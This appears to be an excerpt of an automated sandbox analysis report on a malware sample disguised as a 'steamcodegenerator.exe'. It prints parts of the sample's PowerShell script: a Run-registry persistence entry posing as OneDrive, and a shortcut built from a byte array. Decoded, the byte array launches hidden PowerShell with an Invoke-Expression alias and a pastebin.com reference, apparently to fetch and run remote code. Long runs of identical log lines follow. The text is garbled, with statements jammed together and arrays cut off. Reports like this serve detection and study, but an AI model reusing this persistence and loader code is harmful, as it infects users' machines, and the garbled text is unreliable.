(76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,
0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,
92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: NULL
Source: C:\Users\user\Desktop\steamcodegenerator.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\steamcodegenerator.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
